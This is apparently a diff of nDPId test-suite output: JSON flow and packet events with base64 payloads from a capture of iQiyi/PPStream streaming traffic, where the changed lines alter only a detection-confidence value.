%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +01934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4%3D","code":0,"content_type":"","user_agent":"Qiyi List 
Client PC 5.2.15.2240"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAABuM2xAAIAGDVLAqHMIb84WTcZbAFDJCjUMTd\/tYVAYAQQaAAAAIG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1467353198052,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353198052,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0gHZAADMGDQJvzhZNwKhzCABQxltN3+1hyQo1UlAYACMO1AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1467353198532,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353198532,"pkt":"TF4M6gNlABxCjnAxCABFAAEhM5pAAIAGSV3AqHMI3xpqFMZcAFDCryK2CgBK\/VAYAQQ7tAAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMi5qcGc\/bm89MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 02166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1467353198595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJVAADgGwG\/fGmoUwKhzCABQxlwKAEr9wq8jr1AQAB\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\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAG8QAAEDAwMCBAMEBAgGDQUCHwECAwQFBhEAEiEHMQgTIkEUUWEVMnGBI0KRoQkWJFJyscHRJTNigsPwFyY0Q3OSssLE0tTh8TVThqKz0xg2RGODhIWTo6S0J1RkdHWURnYZN0VVVmVmlZbF4tUp\/8QAHQEAAgMBAQEBAQAAAAAAAAAABQYDBAcCAQgACf\/EAEcRAAIBAwMBBgMGAwcEAQMCBwECAwAEEQUSITEGEyJBUWEUcYEjMpGhsdEVweEHJDNCUmLwFiVy8SY0Q1NzNYKyosJjg9L\/2gAMAwEAAhEDEQA\/APMptJVH130
SjzK1ODEJhT7nfaPYfU\/36sLbZpa5kcVlcxmmZPnLp7aFPYwcbQogZzjufnpudML6tTppWVy7NuK4oNWd+7OqUFmN5GAcbVNvOHnPOQB9dazqvexW8bxLlgK902GK6uRDM20HzpX9Quk14dJ6+mm3hbs635Lw8xn4xrah5PHqbX91wcpyUk9+dVO39FrVXio8T1teJOo0iFdEycw1Qk4p82j0xuVIUFNoS8h5S32knctsODaDjdjSXTR+mhR\/8EV3\/wCdb0Q\/9O132ZlLRu0gOSfSoNQiW2mMQOflzSwqSfu64U5Pq0xp1E6YHG+6LuT\/AOjUX\/t+umJROmSVei6rsV+Nsxv+36hlUfxbf5VSDjZ0oKmp\/Qq120RP8lV+OjiVR+nKm1brouhH\/ozGP\/T9fU2j9O0x1eXdVzrTnv8AxYj8f\/R+j\/fKmqCTB+6fKoi+UxQFTU+pz8TqJKZP2n+f9+mRBo\/Tncry7suVfJ\/\/AAYYH\/T9R36H02+L3Ku250q+"} 02175{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1467353198595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJZAADgGwG7fGmoUwKhzCABQxlwKAE\/pwq8jr1AQAB8TPwAAQtiP\/X8fofczLJZRL\/v\/AJ10rgMaH2Gf0Z1VVRnTPjUywEtnbclzqH\/4txv+36rp9H6bKz5tz3WP6Nsxj\/0\/TXrE0cmn7QD09DVaNjvoBpjfp1znU2VIcOxhxTO3cpxDZUEjnvgfQ9\/kdMGm0bpqlI2XLdrn\/o5FH\/T9HQ6yUG2uklRsGHVriXDly3XBJfo0UFplaUZbSBKJGVpWo+rH6Q8ZJ0lao8w0NVtwc5GeOMfOiVqYmnxKcCg6odBbrtWm0V+ox2Gm6o0XGFCU2spISpRQ4kEqaWEDdtWEn8+Nc5fQi6E7EFMNCluIaAMtGQpRwnPJ4ORydHnUzrNSes\/2KupyKzGZp0NDO+PSY6nZDqRtLrizKHcfvJ1Uzn6DNoUaGmnXP5aWkJakx7dYSp1KVbgorEkhWT3Iz31Qgve0ENiqumF8sjyo+kejk5Lkmq1fhC6hU9DqlM0xzccFLc9ClcKAPGP8odtLOv2vPs6vzKPUUoTMiq2u+UrekH6Ht+zTeVVqHU0T0NWpcm6WzjezbzSVoHqTvQQ7nPqwT+3Vr0XtGkXqK5FtuDc9TktNIVML8unxEoQd4QEl1RGSQc89wNRaRfTWzCa7P2a+f1qneLaFMW2S1Z3nt418lHoT+Gtf0\/wxVG94D1sU62a09IhOtMeWu5qQlYdU0h0cc7glDyCvafzJ1lao0ldLnTYT6C29FecYcRuC9qkKKVDI4OCDyANaFpeo2mrXEq27ZIFBGR41BcYodQCY6tSKJSJlZnCPBjqfe+8Up9h+P9+rC3GqUufH+2lzG6Zk+caelCnsYONoUQO+O5+em50yvu0umdZVMs64rip1Wd5TOqMNmP5GAcbVNuuHnPO4AfXSjqxlggSSJcsBRTTYYrq5EMzbQfOlb1E6TXh0kryKbeFuz7flPArZ+MaKUPp49Ta\/uuD1J5ST351UJb9OtW+KrxO2z4lKjR4d0TZzTVCTtp02jU5qTIUFtoS8l5a32knctsL
G1JxuxnSURR+mpSn\/AA\/d6f8A5QxD\/wBN1x2ZlLJIzqck+lQ6hCLeXuwQcenNLCop241wgJ3uaZU2i9MDjfct3J\/9HIh\/6frpi0bpilz0XPdh\/G2ov\/b9cygfxbd5VSD+DFA0xH6PUijJ\/krn46NplG6cKbO66LpH4WzGP\/T9cqZSOnaWHPKue6Fc\/wD7Mxh\/0\/R8TKmqB8H7p8jUJbKYoCpbf6RzPz\/t1Ekt\/wCESPqNMaDRunO9zy7nuhfz\/wBrMf8A7frpfofTb4w7rqugOZ7fxZjH9\/x+hlzMr2US\/wC\/+ddK\/iPFDjDPp1VVNs86aLFM6fBO1Nx3Qf8A0cjf9v1XzaN02P8Ajbmuwf0bai\/9v026vPFLp+1c9PQ1DGWDcil9SmztPOu6bTZMhYUhhxTIG5TiW1KCRz3wD\/qNHtOpHTNI\/RXDdzv\/AKOxU\/8ATjo5HWShW10lqVgw6ncTkOXLecTJk0mNlthaEZbAEknJWlajzj1n3J0l6o8x0RVtwc5GeOMfOiFr3bT4mOBQhUOgl1WpTaK\/UY0dpuqtFxgolNrUkhKlFDiAoqaVtGcLA\/brnK6FXQnCFIhoUtxLQCpSM7lHCQRk98jv20ddTes1M60fYqqm9WIrNOhts741LjqdkOgbS64syR3H7yc6qZ0mhzKDFi\/ZdylkMIQ1"} 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2456,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1467353199417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353199417,"pkt":"ABxCjnAxTF4M6gNlCABFAAEF4D5AADEGSkB7fW9GwKhzCABQxlcB794psg4Z21AYPLiOgAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzggR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353200271,"pkt":"TF4M6gNlABxCjnAxCABFAAEhNFdAAIAGSKDAqHMI3xpqFMZdAFCAFVM2Sak8SVAYAQQb1wAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMy5qcGc\/bm89MyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKADCuCpAADIG5SVN6ikjwKhzCABQwBY\/zyZ9xn1A6VAYAAIAJQAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtY29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQoNCg=="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {}} 
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {}} 02158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCtAADIG4NJN6ikjwKhzCABQwBY\/zycXxn1A6VAQAAL1DgAAMjINCgMgCKAEEgH\/MhgIBBDmzNlDGIAKIJuhw6jaKiibocOo2ioNCjllMw0KCuATQVNVIVZQU3oDMAYWRgAAAIAJAACTCQAAeNolVXk01V0bfe51iZApMpZ5zjznco0JmeKSIVNeQzKWkDi4Ggwp6UWG1xCxylQRmd6EyCykZKZ0QwiR4vt933fWOuv8cdbZZ5\/9PPvsM3aGIkkMAEZWqjKV8P\/xCJtSB\/NfKOBwomAIFoTLeF+yLcHOykHRDpzBBXxpwIr2Eh5YEZ6EJCLl8EBQxQO\/OhBpYJqkQwMkvZMEQQA3f4Kc7yWvi\/jwS+HAHykF2jRQpasDRv9DcaOBVd0wDIWCO8DvhxfF8YuBBJwikABIjuCE3RKUjAuHSOCNFAIREAUxUMADmUQDQIgCRPgvVUt9JRlWbNXtK5OpsKHJ8J4LK+EyngYrIxUZVhyAmg4FaJkIoGZU33trc5hjTzGJTtUKB9Mx+T3dfmPXIoQ26EABICX6SsW7hX2KlFgnEwnwoJmVWZtN5T3KOpChrYrh213iQtqdReQAD1v9dk08JJYJFluOWyXS+Qf73GcByDko2exVaBzzKIPoSxuJ8RHb72m1UeUvkD\/v216FhyZVmZihHr7WtrYrgarCACFHcqOl7rTojtTlpFlxAKROdfbFzNGM6rxNqVIdOAHcm\/os5hLXL+tKfHtGi\/HbMZpYdZhMeKP9e3jCaJoGjosfkQ4ZHy19+LLw84guwJwa\/9Kt
lu8KY6999xP+Bvj4dedshtyDydKvvvvtpgAl+bo9Df8UGtubKMnkHACwN1E2f0AHkBWdSfPUPXvgqln2dD492SUvokzyVkXQIUBlzVcPHCnc7RZ\/tc8u9KmS7DE4xX62EnoAvc5NZI7V3LhTODiXlfWPiUHKvIWIfwP\/LqADGZnMJDNldpH+uBjbrQapZK+fuOPzW+aAnhW3HhZM585sijetOXliLoa9gCkh9INHCiDXhzXcg\/vpxYIPjRXXRxNKvaI6lu226l8Aivkzy1Ny9ARfXWBlelnoZGwRfmfLmmgZCuiCsz3fuI3zBPjtp6Y5lCjP3ys3qsjmcAREVeoX6HcvcPN3UBngDBwvrmf8LWboGH0E0E1SidB66fcT7RcuptRH0x5\/e5snTfjJ4EFA9CrukkQG\/FZos0p8y8x54czaQvEPHMEPAZX7h0tZs\/DkN\/ReyGJTEQpxaNV6fq6+3gxQd2+SVJO7aPbhn8hRvPDN9bpqNOJ7Zgc7I3K66njSmiFz+dSVFIc2\/1k3fB1jp3XQGqBzSntyXs0dPjnRN5uEu40PrYonyiv7LxhgDJ581+h9hajeR9umb6y\/G1bO8f76fQrKANF5s2vWH3Y1ZL49Vi2gxO84af44zk3gWjsg6clhTdn0aCuv5o1+fJ7HejOvlq9wH7kIM8ZPYWKs58nIykrZmgKpkmDDFgj469W6KSD1DorOyspuG9lyxTo4uS39nIpy1TktrmBA\/sRvhvNBg5FmYRnatdE5Od0m5gLOZ70ogIxyF43qD947ySc4pJOCU6qq7JceMxy26QVEyeI0\/lNvcrsugiCyJrtE\/dIvwhSyroxZcyUhkdxI+4ffajndOqztX68qz1fum6uW2EtV17fJf9FTeneF2Mqb71b7Sm6WLVC5O5MxtNRFe86f6Z1f1L29jwXXUVhj"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":707,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {}} 
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":707,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {}} 02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCxAADIG4NFN6ikjwKhzCABQwBY\/zywDxn1A6VAQAALrNgAALT11Li5gWvs4BXi1xLjmvfKMj0peVQo7lKJXGpIXNwaIVVnV50PDXh\/nhoec299vHndpLUua\/bqpCOjp7McAoWKOkJJNwfqArWbPME9b6btDGVgV0uzbgys3HrUPZGuULZqVvC9cfPh7y1VrCRATr2jIquLGEs7NUuTFUS2\/94Q2D+b6OEydZRO9cPMEkga3a+5FSfXnzkWP45N4tdwDAY3rKF71DNh9qyHNw3zq0kfntg59U62XHN6AJpW5oqhpNP\/KXicl+wTn90pd\/Ux5pxaNuaTtiVisjsDdqJGttkpWFmkIvcN4O3H7Nh+g88QCys9WSrOYR9T1WklqZUIXO2KozevHqrDRk3FhsvxtYk4AY5OTxXPHL2qjoy\/5\/LCO7z9Q0I1UDJ6H3s55a0u\/YyMnFnPMluUDID6DqRJHSb6OUS7lT\/EU7rwQMeL0oaEabUBfFS+XanJaGDL1BZSIyNomFf0DPsUe3djOS8nPpXOhOL\/zzo0NjXvFjylWLV5uSrIEQBYM8WUnB+X2Q2Wcez+wiFByuVMleIMfXAFk2nK\/2ntwKLyC0FBADi6XZL3qNrjHMTQHSC+dvnacGjv84sTgyPra7k8ik3DBtc1vCpiDd8xq36vy